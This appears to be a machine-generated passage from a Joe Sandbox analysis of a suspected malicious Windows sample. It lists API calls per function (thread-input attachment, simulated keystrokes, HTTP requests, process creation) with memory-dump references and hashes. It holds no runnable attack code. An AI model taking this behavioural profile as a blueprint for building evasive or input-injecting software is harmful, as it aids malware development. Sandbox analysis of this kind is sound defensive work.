                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003E9211
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: 71ad12fbff3606df5bcdedd16e0e6d60d0d1ace2fe4c786ac402b93d6526ac7c
                                                          • Instruction ID: fd8bdc4df90444ea45ef4862834c4b01cb1f3aa431f19572969cbf29e094b72c
                                                          • Opcode Fuzzy Hash: 71ad12fbff3606df5bcdedd16e0e6d60d0d1ace2fe4c786ac402b93d6526ac7c
                                                          • Instruction Fuzzy Hash: 18110A762883ABB9FE132626DC06FE7379C9B15760B300627FB00A48D1FF6298525658
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003F7A6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ArraySafeVartype
                                                          • String ID:
                                                          • API String ID: 1725837607-0
                                                          • Opcode ID: ea423bae6ce154f8d954a513008b30f8da84b5ce846b82f7e3e68f4bf3a5f83d
                                                          • Instruction ID: 88f5b08f40eddcfb6d19d10ebeb37dd808e8923fb3bc170299bdae354cd480c1
                                                          • Opcode Fuzzy Hash: ea423bae6ce154f8d954a513008b30f8da84b5ce846b82f7e3e68f4bf3a5f83d
                                                          • Instruction Fuzzy Hash: 94B18D7190421E9FDB12DFA4D885BBEB7B8FF09321F214429EA11EB291D774E941CB90
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 003F11F0
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003F0268,?,00000001), ref: 003F1204
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 003F120B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F0268,?,00000001), ref: 003F121A
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 003F122C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F0268,?,00000001), ref: 003F1245
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F0268,?,00000001), ref: 003F1257
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003F0268,?,00000001), ref: 003F129C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003F0268,?,00000001), ref: 003F12B1
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003F0268,?,00000001), ref: 003F12BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: f27ad11865110453056050af7f991f07d0a2f9dd4b7a164268847b05fa71579a
                                                          • Instruction ID: aeccba3e3ba31f38f4c545d447a60c28bbd12c379f19d79f6e686a461ad3ccd6
                                                          • Opcode Fuzzy Hash: f27ad11865110453056050af7f991f07d0a2f9dd4b7a164268847b05fa71579a
                                                          • Instruction Fuzzy Hash: 3431BF76A00308FBDB11DF94FC88BBA37A9AB54322F128535FA05C72A1D7749D458B58
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0039FAA6
                                                          • OleUninitialize.OLE32(?,00000000), ref: 0039FB45
                                                          • UnregisterHotKey.USER32(?), ref: 0039FC9C
                                                          • DestroyWindow.USER32(?), ref: 003D45D6
                                                          • FreeLibrary.KERNEL32(?), ref: 003D463B
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003D4668
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: f9af7067a2bd50b808434a296b2a88bc111ed5849fdf6ec9e2fef3b57697ccc3
                                                          • Instruction ID: 7acb2897cedf7d5c9b973782e6d1f833bfe9c0c5e9fb628f76d7d4a0ac9ce7f2
                                                          • Opcode Fuzzy Hash: f9af7067a2bd50b808434a296b2a88bc111ed5849fdf6ec9e2fef3b57697ccc3
                                                          • Instruction Fuzzy Hash: 58A17A31701212CFCB2AEF24D595B69F3A4BF05714F1582AEE80AAB261DB30ED16CF50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: ,,B$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-558401663
                                                          • Opcode ID: 9c6f2f41e11ed323edc96882193bfd57de015696be0a3fc7221d71e41d8806ed
                                                          • Instruction ID: ad5b28c3ec9eb3c38d62719543025400840c100cb5f6177e92fde7a95fad2c6f
                                                          • Opcode Fuzzy Hash: 9c6f2f41e11ed323edc96882193bfd57de015696be0a3fc7221d71e41d8806ed
                                                          • Instruction Fuzzy Hash: 61918F70A00215ABDF24DFA5C848FAFB7B8AF49710F10856EE915AB2C1D7749D05CFA4
                                                          APIs
                                                          • EnumChildWindows.USER32(?,003EA439), ref: 003EA377
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: 8022b41b778fe347e501c48187ebcb6b26e4e0d091d64ae62cf8235e17268fe1
                                                          • Instruction ID: df50ed26887a907c32060eae66aa7ccd19d231ec55c16a6b391caba21751faa8
                                                          • Opcode Fuzzy Hash: 8022b41b778fe347e501c48187ebcb6b26e4e0d091d64ae62cf8235e17268fe1
                                                          • Instruction Fuzzy Hash: AB91E730A00A59ABDB0AEFA1C441BEEFBB4FF04304F54861AD549AB1C1DF317999CB91
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00392EAE
                                                            • Part of subcall function 00391DB3: GetClientRect.USER32(?,?), ref: 00391DDC
                                                            • Part of subcall function 00391DB3: GetWindowRect.USER32(?,?), ref: 00391E1D
                                                            • Part of subcall function 00391DB3: ScreenToClient.USER32(?,?), ref: 00391E45
                                                          • GetDC.USER32 ref: 003CCD32
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003CCD45
                                                          • SelectObject.GDI32(00000000,00000000), ref: 003CCD53
                                                          • SelectObject.GDI32(00000000,00000000), ref: 003CCD68
                                                          • ReleaseDC.USER32(?,00000000), ref: 003CCD70
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003CCDFB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 620a20b3d3f155a5ef9742bd2ecb0b38f7646e68f37ec664f62ee1f72da1e81e
                                                          • Instruction ID: 59f7a0b5f2e432bec4da6eb428b6a4fcee4f2c43ba4eec3721008624bf0cedb1
                                                          • Opcode Fuzzy Hash: 620a20b3d3f155a5ef9742bd2ecb0b38f7646e68f37ec664f62ee1f72da1e81e
                                                          • Instruction Fuzzy Hash: BC71D231900605EFCF228F64C884EEA7BB5FF49321F15927EED5A9A266D7308C91DB50
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00401A50
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00401A7C
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00401ABE
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00401AD3
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401AE0
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00401B10
                                                          • InternetCloseHandle.WININET(00000000), ref: 00401B57
                                                            • Part of subcall function 00402483: GetLastError.KERNEL32(?,?,00401817,00000000,00000000,00000001), ref: 00402498
                                                            • Part of subcall function 00402483: SetEvent.KERNEL32(?,?,00401817,00000000,00000000,00000001), ref: 004024AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
                                                          • Opcode ID: 7bd48c6a61659d479b25374f038e66bad03e4ba0ac8ce10196bf91683c40a5d9
                                                          • Instruction ID: 77149f49d584616265d806cc4c40277f31f097bf2348ad0da528a29dfa721693
                                                          • Opcode Fuzzy Hash: 7bd48c6a61659d479b25374f038e66bad03e4ba0ac8ce10196bf91683c40a5d9
                                                          • Instruction Fuzzy Hash: 234142B1501214BFEB119F50CC85FFB776CEB08354F00813BF905A6191D7749D459BA9
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0041F910), ref: 00408D28
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0041F910), ref: 00408D5C
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00408ED6
                                                          • SysFreeString.OLEAUT32(?), ref: 00408F00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: bce550b8efd673b2dc83f1f31df929344b1c3604ed7edfe6959700ed5d5cc45c
                                                          • Instruction ID: 380738181195c7b0a9099322f211ef8800d698eb04694e079e1787bdb6787d98
                                                          • Opcode Fuzzy Hash: bce550b8efd673b2dc83f1f31df929344b1c3604ed7edfe6959700ed5d5cc45c
                                                          • Instruction Fuzzy Hash: 32F17A71A00209EFDF04DF94C984EAEB7B9FF49314F108069F945AB291DB35AE46CB94
                                                          APIs
                                                          • _memset.LIBCMT ref: 0040F6B5
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040F848
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0040F86C
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040F8AC
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0040F8CE
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0040FA4A
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0040FA7C
                                                          • CloseHandle.KERNEL32(?), ref: 0040FAAB
                                                          • CloseHandle.KERNEL32(?), ref: 0040FB22
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: 5334d5444e77259a96b12b00f9e543b9793042b36209f6f39bfd1e5d4a879c22
                                                          • Instruction ID: 626c3ad9ffc65ecf5518ab2f947f1e7a897d3c1c6734ca1a6f12a00d387de19d
                                                          • Opcode Fuzzy Hash: 5334d5444e77259a96b12b00f9e543b9793042b36209f6f39bfd1e5d4a879c22
                                                          • Instruction Fuzzy Hash: C7E1AE316042009FCB25EF24C881B6BBBE0AF85354F14857EF9999F6A1DB34EC49CB56
                                                          APIs
                                                            • Part of subcall function 003F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F3697,?), ref: 003F468B
                                                            • Part of subcall function 003F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003F3697,?), ref: 003F46A4
                                                            • Part of subcall function 003F4A31: GetFileAttributesW.KERNEL32(?,003F370B), ref: 003F4A32
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003F4D40
                                                          • _wcscmp.LIBCMT ref: 003F4D5A
                                                          • MoveFileW.KERNEL32(?,?), ref: 003F4D75
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: e6093facd4cf8feba9802be318c66f9bd324ab2edb42f2c0b9667145b9dfae96
                                                          • Instruction ID: a5c1f3c5a1692e5fec22e8ad4a3c4f7f20f22e1266a711cb2342179e84027c2e
                                                          • Opcode Fuzzy Hash: e6093facd4cf8feba9802be318c66f9bd324ab2edb42f2c0b9667145b9dfae96
                                                          • Instruction Fuzzy Hash: AF5167B20083499BC726DB64D8819EF73ECAF85350F00492EF789D7152EF34A688C766
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004186FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 12e1fcb641597508b0ab7cc623d9a2bd0ac2881a8289526f3eb77c6a8936ac54
                                                          • Instruction ID: 04206063e7d390b5f5d6bf7355b60841ca8a5d20abd2e3174631fcf8f9ea8ec4
                                                          • Opcode Fuzzy Hash: 12e1fcb641597508b0ab7cc623d9a2bd0ac2881a8289526f3eb77c6a8936ac54
                                                          • Instruction Fuzzy Hash: 5751A230500204BEDF209B24CC85FEE7B65AB05324F70412BF954D62E1DB79E9C1CB59
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003CC2F7
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003CC319
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003CC331
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003CC34F
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003CC370
                                                          • DestroyIcon.USER32(00000000), ref: 003CC37F
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003CC39C
                                                          • DestroyIcon.USER32(?), ref: 003CC3AB
                                                            • Part of subcall function 0041A4AF: DeleteObject.GDI32(00000000), ref: 0041A4E8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 77503724b51f449902fc5c7c8f4697b557274ebf952c4d33b3d73d2fd4b93d3d
                                                          • Instruction ID: 93e2ae910db0d5f0b38031182ffb76ae5d96c9cc3f64091c069a0bf7f33467f2
                                                          • Opcode Fuzzy Hash: 77503724b51f449902fc5c7c8f4697b557274ebf952c4d33b3d73d2fd4b93d3d
                                                          • Instruction Fuzzy Hash: 48515674A10609AFDF26EF64DC45FAB3BE9EB18310F108528F906D72A0DB70AC91DB50
                                                          APIs
                                                            • Part of subcall function 003EA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 003EA84C
                                                            • Part of subcall function 003EA82C: GetCurrentThreadId.KERNEL32 ref: 003EA853
                                                            • Part of subcall function 003EA82C: AttachThreadInput.USER32(00000000,?,003E9683,?,00000001), ref: 003EA85A
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003E968E
                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003E96AB
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003E96AE
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003E96B7
                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003E96D5
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003E96D8
                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003E96E1
                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003E96F8
                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003E96FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                          • String ID:
                                                          • API String ID: 2014098862-0
                                                          • Opcode ID: 6f042b02495042411382e598073f6a23197b5200a641a0ac35ed819f820010a7
                                                          • Instruction ID: 7739afb1d857a338860ed8be840b09c31d43664bcf3672ca8b44300f2984297f
                                                          • Opcode Fuzzy Hash: 6f042b02495042411382e598073f6a23197b5200a641a0ac35ed819f820010a7
                                                          • Instruction Fuzzy Hash: 4111E571950A18BEF6106F61DC49FAA3F1DEB4C760F104535F244AB0E0C9F25C12DAA8
                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 003E892A
                                                          • HeapAlloc.KERNEL32(00000000), ref: 003E8931
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 003E8946
                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 003E894E
                                                          • DuplicateHandle.KERNEL32(00000000), ref: 003E8951
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 003E8961
                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 003E8969
                                                          • DuplicateHandle.KERNEL32(00000000), ref: 003E896C
                                                          • CreateThread.KERNEL32(00000000,00000000,003E8992,00000000,00000000,00000000), ref: 003E8986
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 0772afdf0beba8233ce707712c0967e5d0ed99255fdfe34027a258735f18a924
                                                          • Instruction ID: ecc6ace9d65e8c472d8556750ca78942648fc417365124c241a330536b30806b
                                                          • Opcode Fuzzy Hash: 0772afdf0beba8233ce707712c0967e5d0ed99255fdfe34027a258735f18a924
                                                          • Instruction Fuzzy Hash: 1A01BFB5640344FFE710ABA5DC4DFA73B6CEB89711F408521FA05DB191CA759C05CB24
